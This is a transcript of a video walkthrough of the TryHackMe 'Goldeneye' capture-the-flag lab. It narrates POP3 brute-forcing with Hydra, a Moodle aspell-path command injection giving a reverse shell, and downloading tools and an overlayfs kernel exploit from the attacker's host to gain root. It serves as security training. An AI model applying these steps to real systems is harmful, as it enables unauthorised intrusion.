Hi, welcome back to Sabretooth and Nethemba, where we care about your security. So the last box we did, I think, was Beep on Hack the Box. That's true. Today we are Try Hack Me. The last Try Hack Me box we did was Mr. Robot. So it's already set to medium. That's what I did last time. I went to the very last box in medium for Mr. Robot. It's this one. Do we fancy doing a James Bond 75-minute capture the flag? Because that was only 30 minutes. 70. Ooh, let's do it. Let's give this a go. Okay. So is this Goldeneye CTF or just Goldeneye? Just Goldeneye. Okay, fine. Medium. Add subnode. I'm not sure if this is based on the Pierce Brosnan movie or if it's based on the N64 video game, but I have experience with both, so whatever. Let's get to our sudo open VPN connect to TryHackMe's server network. My apologies. Let's also get this down here and across. Fine. What we will do is join the room and oh dear, look, we've got a lot of hints and things, so let's not read any of those. Start the machine. Don't fancy reading any of those, so let's just do that. To hide anything which I might be tempted to read, although I'm going to have to go back there to get the IP anyway. What we'll do is we'll make a new directory in boxes called Goldeneye. We'll change directory into there. We will open a few of these and then just have a quick check. Sure, fine, we look good, we look good. Quick check on the IF config. It should be still 102.67, which it is. And I think that's it. I think we're just waiting 36 seconds for this. What's this popping up? It started. Hooray. Oh yeah, I'm not reading this anyway, so that's fine, because it says first things first, connect to our network and deploy the machine. So this is apparently 70 something minutes, 75 minutes, but that's following this guide. So it could be like 1.5 or even 2 hours without it. Also, this system is rated medium, but that is with following the guide, I believe. So it could even be hard. It could even be harder than we probably think. Let's find out. Let's find out anyway. So what we will do is nmap all ports, being aware that they may not have even started up yet. Some services could take a while. Obviously we're going to try the web because that's what we do. That's how we roll. Goldeneye auxiliary control station, top secret access, access and server identity, server name. Navigate to Sev Home to log in. Okay, can this be selected? It can, nice. Again, web on 80, chose. Okay, so we're going to go to here, Sev Home. Okay, this has a basic auth login. You can't brute force these too easily, or at least too quickly. This has basic auth login. To do. So we're going to come back to this, right? Do not forget that this exists. Fine. Okay, we have this as well, which is nice. We don't have the operating system. I have a feeling it's Linux because if it was Windows, port 80 is likely going to be IIS rather than Apache. So I think we're on a Linux system here. We have 2 high ports here with SSL and POP3, which is email. We have the SMTP for email as well. These are not normally on these ports. These are like 135 or something like that, or 139, I can't remember. But as this is SSL, I wonder if we can access this via web. Let's take a look. And we'll do HTTPS because it's secure, right? Oh, I see, it ends in 006 and 007. That's clever. I get it. Okay. It may make sense in this case to try 007 as well, but if we know it's POP3, it's not going to load in a browser, not properly anyway. And it won't be HTTPS either. Yeah, that's fine. Okay, so we've got email system on 2 ports. One of them is secure and one of them is not, as in it's HTTPS SSL, sorry, or TLS or whatever. Okay, let's get back to the main website here. We're going to hit robots. I hope they don't hit back. And then we're going to try directory brute force as well. We'll just do the small list for now, see how that goes. Okay, fine. So I'm not sure what else to be doing in the meantime. I'm not sure what to be doing in the meantime, except for looking into the POP3 ports or the SM, but I need to be able to log in as a user for those. I'm not sure about this basic auth login as well. It's fine. I guess I could brute force it, but I need a username really. There's no default name there. I don't quite know right now. So I'll tell you what I could do there. I do know. I could go Nikto. Try Nikto. I always forget this exists. Host. I'm not sure if I've still got the... Yeah. See what this comes up with. Splash admin.php Cobalt Cube 3 admin is running. Is it now? I will check it out in a minute, but I've not heard of this. So let's have a quick check on search exploit. See if there's anything here. Authentication bypass and webmail. Huh. Let's check these out before I do anything else. Weak authentication mechanism fails to validate the input in the client cookie. Could get admin on the device, huh? Could be interesting. I'll keep that up. Let's first make sure that it's correct and head here. Nicto shows splashdmin.php, so we'll go there. Just take a look around to see if that is actually true. Oh my god. Oh, Cobalt Cube has been decommissioned. Maybe it's disabled then. Okay, I really can't. Okay, fine. Let's just copy and paste because it's going to be much easier. This URL shows. There we go, I can read it now. I'll come back to that exploit later if I need to, but it looks like it's been disabled, although I shouldn't really take that at face value. We can use this page to put up team photos discussion. Natalia is not allowed here though, Boris. Here's me with my new sniper rifle. Okay, so it is the video game. Great game, by the way. Boris, why are you wearing shorts in the photo? Your favourite pen broke. Best coder. License to kill. Complex grenade launchers. No odd job. Those were the rules. Those were the rules. If you know, you know. Greetings, Goldeneye admin here. Programming for the alternative to GCC, which FreeBSD uses. Okay. I've replaced GCC with this throughout the Goldeneye systems. Right, let's make a note of this. So, GCC is the C language compiler. I think the FreeBSD version is called CC, I think. I could be wrong. Yeah, CC looks like CLAN BSD, FreeBSD. Okay, got it. FreeBSD man page for CC. Okay, compiling with CC. Fair enough. So I think CC is, I've used BSD, but not for a long, long time. Okay, so we're going to put in another to do here because that's going to be important, i.e. come back to this. We also have usernames, possible usernames. So we've got Boris, Natalia. We've got admin, of course, whether it is an actual username or not. Goldeneye admin. Why have you been chatting with Xenia in private? So we've got Xenia. She's a new contractor. You've never met her before. You're sure you've never worked together. Admin, and Yanis was here as well. So we've got 5 usernames from here, which we could use for brute force of the basic auth login, or even the emails or something. Okay. Is this done via JavaScript? Because if it was like Flash or something, well, if it was Flash, it wouldn't load. Hang on. Let's have a look. No, wrong one. Yeah, it's a terminal.js script. How's it wrong? Let's just span, that's the data, and oh, hang on a minute, we've got notes here. Make a note of that. Oh yeah, fair enough, that's fine, simple enough. Interesting, okay, so, good job I checked. So the source code has... Okay, Boris, make sure you update your default password. My sources say MI6 planning to infiltrate. Be on the lookout for any suspicious network traffic. I've encoded your password below. Okay, this looks like decimal. Intelligence says you can break your codes. 73 is I, 110 is N, 118. Do you know what? Let me just find some way of doing this. Decimal to ASCII. It's not going to like the there we go. Nice. Nice. If you're wondering how I can recognize this, I've been playing challenge sites and I've even created my own as well. As you can see. So I've been playing these sites for many years. I'm talking decades. So I can recognize encodings, you know, very simply. So yeah, definitely decimal. Deck to ASCII. I've not done anything with my site for a couple of years, by the way. So if you want to sign up, some things may be broken. Just to let you know. Okay, I wonder whether that's either an email password, email pass, or basic auth pass, or SSH. Oh, we've not got SSH, so it's not open, is it? We'll try the basic auth because that's the easiest one to get to because it's on my to-do list. So we'll go back here. Boris. And the password was this. Nice. Oh, not nice. I don't like that. View source. Quick view source. Should be an epilepsy warning. There we go. Moonraker.web. I'll tell you what I could do actually. Oh, I thought that'd break it, but it's already running, so obviously not. Fine, fair enough. Epilepsy warning, sorry. Okay, so instead of this is Boris's basic auth pass. We can get rid of the to-do on this now that we're in. Let's just make another note of where that was. Okay, so on this page we have Goldeneye's top secret Soviet orbital weapons project. You have clearance and qualified to be certified. Fine. Please email a qualified GNO supervisor to become an administrator of the Goldeneye system. Since security by obscurity is very effective, it really isn't. We have configured our POP3 service to run on a very high port. Yeah, we know that. And what's on index.js? Anything here? As there was before? No, there isn't. Okay. Oh, it has killed it. Brilliant. Obviously, when it looped, it couldn't find the... Oh, no. Forget it. So, this has... Right, well, let's close this page off before I start having seizures. I'm not epileptic, by the way. I just thought I'd mention it. I'm sure there are some out there who are photosensitive. Right, so this is... I'm guessing I need Boris... Maybe it's the same password just for Boris's email, right? So there's nothing else interesting there. We'll get rid of that. That finished. I'll go straight for the big list. Skip medium, go straight for big and leave that running. Okay, shall we use Netcat or Telnet? Let's Telnet. 10.10.91.167. On port 55, what's it, 007. Goldeneye mail. Okay, our user is Boris. And our password is... Right. Okay, no it isn't. Oh, man. Okay. Okay, right. We can try brute forcing some emails, right? So let's get our list of usernames. Nano usernames.text. In fact, I don't think it makes a difference whether there's a space, a new line there or not. Fine. Hydra. Hydra. I just go blank when dealing with Hydra, you know. Right, let's find... No, we don't want that. We want Hydra. Hydra LP. Okay, right. I'll tell you what. Let's just copy that. And we'll put it into here. Okay, so we're going to use capital L for the list of usernames, which is usernames.text. The password we will do, well, I suppose rock you, I guess. .text. The IP address is 10 something. I literally just had it a second ago. 10 10 91 162. I'll just copy it. Oh, the port is okay. Let's remember that as well. Right, hang on. I think it's S for the ports. And then instead of having to deal with all this HTTP post form and everything, we literally just put POP3, which is the name of the service. I think that is it. So let's correct that into there. Oh, it says check with the small word list first. We probably should do that because that could take ages. So we'll do like fast track or something like that, which is one that I like using for small lists. And I'll tell you what, we'll give it like an insane amount of threads, like 50 or something like that. What do we reckon? Why did that not work? File on logins not found. Oh god, I changed the wrong one. Right. Usernames.text. I've lost it. Right, this one here, fast track. Ignore. Right, let's make a copy of that. See what it comes up with. If anything, 22 tries per task. It shouldn't take long then. Should be done in a few minutes. Then we could try a bigger list, I guess. Oh, it shows it's got 6 logins. That's because I left that empty line at the end. I probably shouldn't have done that. Or do we have 6 usernames? I can't. Oh, look at that. Boris Secret 1. Perfect. May as well wait for it to complete in case it has any others, but I'm not sure it will. Got Natalia's as well. Let's leave that running for a bit. Yeah, I've only got 5 usernames here, so it must be treating my empty line as a as another one. Whoops. It's going to take 2 minutes to finish. It's done 411 tries so far out of 1080, so we may as well just wait. But I can actually just take a copy of these two for now. Don't need all the other gumph, just the things. Maybe I could actually, rather than just wait here doing nothing, maybe I could try logging in as some of these. Right, okay. I'll try logging in as some of these. So we're going to go telnet. Can never remember the IP. 10, 10, pass. 91.167. 55.007. User Boris. Pass. Secret 1 with an exclamation mark. Okay, this is taking a while because we're also brute forcing at the same time, so I think we're kind of throttled. Probably wait for this to finish first. Oh no, it logged in. It's just taking a while, right? So we're going to list available emails. There's 3 of them, so we're going to retrieve 1, retrieve 2, and retrieve 3, and then we can copy these and read them. Okay. Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here. Okay, so maybe we can have like passwords or viruses or something in emails. Boris, I can break your codes. That's from Natalia. Oh, we've got Alec as well. I missed Alec out of my brute force list. I didn't even realize that. Boris, your cooperation with our syndicate will pay off big. Attach our final access codes for Goldeneye. Place them in a hidden file within the root of the directory. Remove from this email. Once Xenia gets access to the training site and becomes familiar with Goldeneye terminal codes, we will push our final stages. Keep security tight or we will be compromised. Okay, well, that's not good. There's nothing in there that's useful. This is kind of going mental at this point. Has it found anything else? No, it hasn't. It's got 181 more tasks to do. And if it's doing 226 a minute, it's going to be like 30 seconds. I need to scan with Alec as well, because I've not done that, you see. Whilst that is happening, we're going to do the same and go user Natalia. And the password was bird, right? It's taking a while because of the brute force. Speaking of taking a while, how are we doing for time? We're about half an hour in of a 75-minute box. Fair enough. Forgot about this. I didn't make a note of it, did I? Okay. Okay, there's only 38 to do, so that's nearly finished. Logged in. So we're going to list emails. There's 2. We're going to retrieve 1 and retrieve 2. Nice. So we'll make a copy of this and then give it a read. Before we read this, though, this should be finished. So we're going to do this again, and we're going to change the username, the L, to a single username instead of a list. I'm just going to put Alec in here. Okay, so that's fine. This is going to be done in no time with 4 tries per task. So let's take a look. We have Natalia, please, you need to stop breaking Boris's codes. Also, you are GNS supervisor for training. I'll email you once the student is designated to you. Be cautious of possible network breaches. We have intel that Goldeneye has been sought after by a crime syndicate named Yanis. Okay. This one's from Roots. So instead of admin, I wonder if Roots was our user. I didn't think about that. Okay, Natalia, I have a new student for you. Enter into the guise of security. User credentials are nice. Nice. Okay, so I'll read the rest of that. I'm just making a note of this before I forget. There we go. Boris verified her as a valid contractor. If you don't have the URL on our internal domain, 7niastation.com GNO cert directory, make sure to edit your host file. Okay, fine. We shall do that. We'll try it once more with root as well. Okay, sudo nano etc hosts. Still can't remember the, it's 10.10.91. I know that much, I've remembered that much. 167. I don't want too many numbers in my head because it'll mess me up when trying to remember my own IPs and things. So that means we should be able to go to there. Okay, so I mean, what's the difference then between going to 7 Station or just the original site? Let's find out. Or is there a difference? Incorrect access detected. It may only be accessed through 7 Station. Got it. So it's redirected. Anyway, that's fine. I'm happy with that. What we got? Moodle. Now, I know Moodle so well. It's the education platform, right? So I know Moodle. I even know the admin options of Moodle. Some of them, not all of them. So this is going to be quite nice. First thing we're obviously going to check is search exploit. There should be a few for Moodle, but it depends on the version, right? Yeah, there's a few. There's a few. So obviously what we're going to do is if we have to use exploits, we're going to try the Metasploit ones first because they're just the easy wins. Oh, there's another one there. But as long as it's the right version, you see. Okay, let's log in then. Xenia, right? Admin is already logged in there. Not logged in, just username. Right. How's this doing? Okay, nothing there. Right, I'm going to use this opportunity to get a drink and then I will be right back. But I'm back. I have more water, which is nice. Okay, so we've got username admin, which is already in there, interestingly enough. There's no password associated. I don't know. Okay, so what we do have though is Xenia and RCP90 rules. I agree, that's a fantastic weapon in the game. So we'll go Xenia. Xenia. Save that, because that means we are in. That's good. New message from Dr. Doak. I remember him in the game. He was in the facility level. He had like a white coat and a like test tube or something, and a gun, and a key card. Greetings, Xenia, as a new contractor. So this is not a administrator account. It's literally just a regular account. Okay. Hang on, let's just check private files as well. Nothing in there. Fine. Okay, let's copy this. We log into the Moodle service at the above URL as Xenia and find okay, what does this say? As new contractor, welcome you once your account has been complete. More courses will appear on your dashboard. If you have any message me via email, not here. My email username is Doke. Okay. Okay, so Doke has an email account. You know what we're doing now. There we go. People having weak passwords. Don't do it, guys. Okay. Good. So we're going to log into Doke's email. Oh, got another username and password. Stop putting credentials in emails, guys. Seriously. See why this is a CTF capture the flag style box, because this, I say it wouldn't happen, but you know, I have seen it. James, if you're reading this, congrats, you've gotten this far. You know how tradecraft works, right? Because I don't. Go to our training site and log into my account. Dig until you can exfiltrate further information. Dr. Doke for England. Dr_Doke, in fact. Okay, so let's go back to Moodle. This was quite straightforward so far. Bit of brute forcing and a bit of whatever. Nothing out of the ordinary. Dr_Doke. Yeah, we'll remember that. Good. So site pages, blogs, my profile, messages, admin user. Okay, private files. Aha. Okay, nice. So, in fact, I'll just save that. Okay. Doke has something in his private files. Secret dot, was it text? I think so. I was able to capture the app's admin credentials through clear text. Text throughout most web apps within the Goldeneye servers are scanned. I cannot add credentials here. Something juicy is located. Okay. Fine. So something else to get a password out of. Oh, man. Okay. Just go here instead. Just to keep that open in case I need it. Okay. Fine. This location is an image. Well, let's just wget it instead. It's just easier. Wget that. Clear that. Okay. This might seem strange, but I'm going to cat out this image to see if there's anything readable in it. I'm quite good at steganography on the challenge site, so this shouldn't be too much of a problem if so. Generally, I'd use a hex editor, but this is just a quick, dirty way of seeing if there's anything here which is readable. Sometimes there is, sometimes there isn't. Ah, there we go. That looks like base 64 with the double equals. It's in the EXIF data. Okay. We cat out the image file or use a hex editor and see a base 64 encoded string. So let's decode this. echo that out. Yeah, there we go. And the results, we're going to send it into base 64, decode. Boom. Nice. There is our password. You can also do this using base64decode.org or net or whatever it is, I don't know. Okay, we have this password, and it does say here that this is this app's Moodle admin credits. Okay, so admin that on Moodle. Let's give it a go. Log in. Admin. Huh, that didn't work for some reason. Oh, we've got space after it. My mistake. Perfect. Nice. We are now the admin user. And we've got site administration and things. Now, I know Moodle relatively well. I'll tell you what I'm going to do. Hang on, let's get the version first. How do we find the version? Notifications, I think. Yeah, Moodle 223. Okay. So, shows version 223 in use. Great. So what I can now do is refine this list by putting at least Moodle 2 or 2 point something. It's sort of taking this as well. 2 point SQL injection. Right, let's do Moodle, and we'll just do Metasploit because these are the easy wins. If we can find Metasploit in here. That one's too high. This one, hang on. Let's check out this one. 223. Yeah, it says it up here. Oh, look at this. This module was tested against Moodle 252 and 223. Perfect. This might be our way in. This might be our way in. Okay. Right. Remote command execution. Perfect. So, I mean, there's plenty of others to be checking if not, I guess. But I think MSF is easy win, generally. Okay, search exploit shows. Search split shows as well. Which is RCE for version 223. An authenticated user to define spell check settings. Update the spell check mechanism to point to a system installed a spell binary. By updating the path, an attacker can run arbitrary commands in the context of the web application upon spell checking requests. Okay, so let's make a copy of that. Just so we we've got it in our notes at the very least. Okay, let's do this. MSF console. I mean, I'm not sure about the spell check. Where would it be? Would it be under maybe language then? Not language. Plugins, spell checkers, text editors probably. Tiny MCE. Did I see Tiny MCE? I think I did. I might be wrong. Where did I see it, if so? Maybe I didn't. Editor settings, tiny MCE. Don't think that's what I saw though. Okay, we're in the right place at least. Let's have a look. Editor, spell engine, Google spell, language list. I've seen the language list though. Haven't I? No, I haven't. I thought I had. No matter. Okay, whatever. Fine. And I'm not sure where it would put... I'm not sure where it would put the payload. Find it. MC page. Oh, there's a language list, but again, that's not the one I... P spell shell. And that's the language list. So that's the settings page that was just on. Hang on. Yeah, language list, and that's the thing. User bin do. Where is that? System paths. System paths. Where's that? Development. No. System paths. Server system paths. User bin do. I've just seen that. It's here. And the payload goes in the A spell path, which is here. Oh, it is running commands. So all it's doing is updating that with a... Shall I try this without actually running Metasploit? I think I might be able to do this without running Metasploit. I think I just need to change that to a reverse shell. And that's it. Oh, and it said something... I probably should have kept that going, to be fair. Oh, this is dumb. Right, let's have a look. See what else it's doing. No, that is it. And then it says here that by updating the path for the spell checker to an arbitrary command. Yeah, absolutely. Can update the spell check mechanism to point to a system installed a spell binary. Updating the spell checker to use the system a spell. So it... Yeah, that's it. It just puts the payload in there. And then it sets the spell engine to P spell shell. Is that an option? Is that an option? Can't do it here. Aha. Okay. We will try this exploit manually. Now, in OSCP exams, and that Metasploit is heavily restricted. So sometimes you're required to read exploits and then convert them into manual ones just to get around that restriction. I had to do that in my exam. Really fun, actually, and we're doing it right now. So we follow instructions and set the spell engine to P spell shell at this page. Okay. So we'll set that, and then what was it? Server? Was it system paths? Yes. And then we go to here. If this doesn't work, I'll just run the Metasploit module. I just want to try it first, you know. we'll go here and change the path to ASPAL to the following reverse shell. So now we just need to find a decent reverse shell to put in there. So it's running sh, which is a shell thing, then telnet. With Python's installed. Here's a Python shell. I'm not sure what payload it used in here. Let's take a look. What payload did it use for the... What did it change it to? It says payload encoded. But where was the payload first set? I don't know where the payload... Oh, the payload is set within Metasploit, isn't it? Right, okay. So it's not going to be in this code. It's part of the Metasploit framework. Got it. Right, I'll tell you what we'll do then. We'll go to reverse shells. If it's Linux, it's going to have Python installed of some kind, I think. So let's do that and just change that to our IP 10.14 102.67 port 1234. Yeah, okay. Right, we're going to NC LVP 1234. Thank you so much. We're going to put our payload into here and save. Now we just need to activate the spell checker. How do we do that? I guess we just run it, don't we? So we'll create a new blog or a new something, new entry. And the spell checker is... here. Okay, let's see if this works. Perfect. Great. Nice. Nice, nice. We then... I wonder why my tab is in at the minute. Weird. We then create new blog post and run the spell checker, and that of course runs our code instead, and we get this. Who am I? Brilliant. Cool. We've just converted a Metasploit. Well, we've just manually run a Metasploit exploit, and really I could probably write some Python code just to do it all without Metasploit. I might do that if I get time, if I can be bothered. Who cares? I'm just happy that worked. I'm proud of myself on that one. Okay, so what now? Do you know what? I'm bored. So I'm literally... First thing I'm going to do is get limpies, because I've just had enough now. It happens, you know, some days you're just not feeling it. So reverse scripts, and then we're going to do sudo python 3 m http server port 80. Uname A. This is a 64-bit system, so we're going to wget http 10.14.102.67/limpies.sh. Change the mode of that to executable, and then run it. Okay, so if something's red and yellow, we're going to go immediately there, because that's probably the way in. Oh, straight off. Linux version. Okay, it looks like we've got a vulnerable kernel. Okay, right. Let's copy this. Limpies shows. I will have a look through the rest of the thing if I need to, but as vulnerable. You know, if this is yellow and red, then we're going straight there. And I'm even going to put here yellow/red. Okay, but just to be thorough, we probably should have a quick flick round everything else. To see if anything else stands out. What's on port 5432? It's internal only, but I don't know what that would be. PGP signatures, not to be confused with SSH keys, it's not the same. SSH isn't enabled on here anyway. .006 final XFF flag index.html. What is this? What is this? You captured the codes and stopped Alec Trevelyan from his indestructible vengeance. Oh, is this where I get taken to after I rooted the thing? Oh well, mission accomplished. I'm done. Lol. Okay, fine. Let's carry on. That's funny, as if I skipped a step, or two, or three. Hang on. So we've got Trevelyan 006X Moodle. So that's the database, passwords, alt main. Wow. That's the configuration files. Interesting. Oh, password salt main. That's the salted password, my mistake. So we haven't got access to that. I mean, not yet we haven't, but we've already got admin as Moodle, so what's the point? Maybe there was another route which we've just sort of, not another route as in route of the system, but there's another route into the system that we've just not dealt with. Okay, let's take a look at this. What we'll do is we'll actually, if that exact version is vulnerable, that's what we're going to put into search exploit and see what happens. So search exploit, boom, no results. Okay, so now we're going to bring it back slightly. Okay, Linux kernel. So we don't need unified remote because that's not what we're dealing with, but it's going to be one of these two. Ubuntu 12, 14, or 15. Ubuntu 14.04. Yeah, absolutely. So it's going to be one of these two, I guess. That's a text file, and that's a C file, so that's going to need compiling. Oh, of course, GCC doesn't exist. That's the C compiler. Right back to the beginning. Brilliant. Okay, nice. So we're going to do search exploit 37292, but we're going to do 37292. And you can see that it's downloaded here. So let's kill that. Let's do it again in the Goldeneye directory. And now we can wget http 10.14.102.67 slash, what was it called, 37292.c. 37292.c. Right, we then compile it. Okay, so we could always cat. God, where am I? Right, clear that. We can cat 37. You can see why I've got so many tabs open now, just to see if it gives any hints on the best way to compile. Sometimes it does, sometimes it doesn't. Yeah, here, gcc ofs.c. Okay, so the first thing we're going to do is rename 37292.c to ofs.c. Not that it matters. Not that it matters. But I've lost it. Where is it? Here. So we're going to run cc instead of gcc to compile this. Okay. Paste that in. Compile. Okay, so we've got warning. Warning. 5 warnings generated, but nothing else, so we should be okay. And then we run it with ofs. Oh, gcc not found. Huh. I use cc there. That's interesting. Okay. We upload this to system and attempt to compile, which does work. It does compile, but as it's running, it says GCC not found. That must mean, it might mean, probably, that is there a reference to GCC in this code? Okay, easiest way to do this will be to actually go into Box's Goldeneye, open this in a text editor. I mean, I could open it in Nano, but an editor like this, and then you can just search for GCC. No, that's in the comments at the start. Next, there is right here. Any more? No, just those two. So there is a reference to GCC in the code itself. We can change this to CC because we know that works, and re-upload, compile, hopefully. Okay, so let's do that. Let's change that to CC, save it. What we can now do is rename this to ofs.c. I think that's what it was. Okay, so we're going to remove everything. An exploit looks like it's being created by the exploit. Oh my god, remove. And these are all directories as well. Okay, I'll tell you what, I'm going to go into temp. I'm going to make a directory, exploits. Then we're going to go into there, which means that now in this location, none of that stuff exists. Because if that stuff exists, and then we try and compile again, there might be a conflict. So if we do it in a new location, it won't be there, right? So we're going to wget http 10.14.102.67/ofs.c. Then we can run exactly the same code as before, which is this. And now there is no reference to GCC within the code. That's also going to run with CC, I think. So let's try it. Paste. 5 warnings generated as before. Who am I? www data. OFS. Who am I? Root. Right? Fine. It's just simple changes. Simple changes. Sometimes people run an exploit and it fails and they just think, oh, that doesn't work, I'll move on to another one. When all you need to do is just read the code. Read the error messages. Oh, it's not doing this. GCC. Why is it referencing GCC? Look through the code. Figure it out. Change it. Okay? This is the difference between a script kiddie and somebody who actually knows what they're doing. And I'm not being big-headed by saying this, but all I'm saying is, if all you can do is run somebody else's code, there's a problem. If you can write your own, fantastic. If you can modify code, great. If you can convert code from, for example, Metasploit to and do it manually, great. It means that you've just got a little bit extra there rather than just try running something. It didn't work. Fine. Lesson, right? Always read the code. Even if you don't understand what's going on, figure out the gist of it, right? I didn't understand everything that was happening in this code. I didn't understand most of this, but I got the gist of it. We figured out he was working with the tiny MCE. We figured out where it was putting the payload. Okay, he was setting the particular engine. He was putting the payload in a certain place below this, right? There you go. Okay. We will cat root/root.text. Okay, hang on. Let's get this first. I've already got it. We have got it. Why is that not in root.text? Let's cd root ls. It's empty. lsa, hidden files. It's a hidden file. .flag.text. Stupid. Would it have worked if I'd done... Oh no, I better not actually. I was going to do... If I could have done cat everything, because it may have got all this stuff as well. So cat root dot flag. If you capture the flag, make sure to go here. Yeah, we've been there. We weren't there first. You're too late, mate. You are too late. Done it. Let's answer these questions and get this done. We have been on a 75-minute box, an hour and 8, so 68 minutes. So another 7 minutes and we're caught up to the target time. But I've not been using this to help me, so that's good. First things first. First things first. How many ports? 4. There was 2580 and then 55006 and 55007. Let's check the hint. And it shows you exactly what to do. Fair enough. It's not even a hint. Solution. Dive into the source code. Inspect all the scripts. Yeah, we did that. Who needs to make sure they update their default password? Boris. What is their password? Invincible hacker, but I can't remember where the 3s and exclamation marks were. There it is. No exclamation marks. Fair enough. Users' credentials and log into a part of the site. Mail time. So we've done that. Use another program to find out other users and passwords. Maybe Hydra. What is their new password? That was secret 1 with an exclamation mark. Going to give me a... Yeah, pop3. Fair enough. What service is configured to use this port? pop3. Using that service. Yeah. What can you find on the service? Emails. What user can break Boris's codes? Natalia. We're still recording. We're still recording. That's good. Find other users' passwords. I think what you're meant to do is get into Boris's account first, then find the other usernames from the emails, and then brute force their accounts. As it happened, I found all the, I found quite a few of the usernames from that other page thanks to Nicto and did it that way. So whatever. Hint. You will eventually get Xenia's password in plain text. No, I didn't. I didn't at all. I got Natalia's, but okay. Goldeneye operators training. Not care, don't care, don't care. Okay, add that to your host file. Try using the credentials. What user can you log in as? Xenia. Have a poke around the site. What other user can you find? Alec? No, who was it? Oh, Doke. What was the user's password? Goats. Pop 3 and hydrate. Yep, fair enough. So far, we're doing it the way that's intended. What is the next user you can receive? Oh, Dr. Doke. Okay. What was the hint on this one? Emails. Yeah, fine. What is this user's password? Can't remember. Was it that winter one? Let's have a look. No, it's this one, for England. Okay. Oh. Yes, I know there's a space before it. That shouldn't really matter in the grand scheme of things. Good coding, try help me. Take a look at their files on the Moodle, download the attachments, hidden messages, use EXIF tool. No, I just catted it out, to be fair, but I could have used a hex editor or EXIF tool. Log in with a newly found user. Look into ASpell, the spell checker plugin. What's the hint on this one? Settings, ASpell, path to ASpell field, add your code to be executed and create a new page in spell checker. Blimey, why don't you just tell us exactly what to do? I know it's a walkthrough, but that's kind of ridiculous. Okay. What is the kernel version? It looks like we've done everything the way that's intended, to be fair, which is nice. Kernel version is this. The machine is vulnerable to the overlay FS exploit. It is, that's what we used. Oh, what's the hint on this? Uname A, okay. Right, let's see exactly what massive help it gives on this. Mount, okay, this is what the exploit does. You can download the exploit from here, 37292. That looks familiar. Is that what we used? Is that what we used? I can't find it. Uh, 29324 we used. So that's a different one. Maybe 37 whatever it was would have worked straight off. Whatever, that's okay. Oh no, that was the no, that was the other one, wasn't it? Yeah, that was the oh, come on, get with it. MSF console one. So what I've put is LinP shows that, and then we upload this to the system. So I didn't even make a note of that. Right, okay. Make notes, guys. Research exploits this and find. No, I'm getting confused. So what was our final exploit? What was our final exploit? I can't even remember. Yeah, 37292. Okay. Just gonna get back there quickly. There we go. There we go. That's the one. See, I missed something in my notes. There we go. Got it. Right. So we did actually use the same one anyway. Fix the exploit to work with the system. Remember, enumeration is your key. What development tools are installed? Very simple fix. You either change one character. Yeah. We got rid of GCC and we changed it to CC. So this is the intended path. That's quite interesting. What is the root flag? We have that at the bottom here. that is it. We are done with Goldeneye. That was actually quite fun. That was actually quite fun. Good stuff. Nice. There we have it. Yeah, I'd rather not. So now, as soon as you put in the last solution, the time remaining in your box goes down to 10 minutes, so it expires, but I'll terminate it manually. And also leave the room. I'm not sure if that's done automatically or not, but that's fine. Good. I'm actually really happy with that. So, yeah, quite a fun box. There's a lot of brute forcing regarding emails. I think the base 64 in the image was a bit strange. The exploit modification was quite nice. I quite liked that we didn't have to use Metasploit. Not much else to say, so thank you for joining me. Next time we are going back to Hack the Box on Friday, of course. And be sure to join, I keep saying join, because I say join me, right? Be sure to visit nethemba.com for all your pen testing needs. Thank you so much. Goodbye.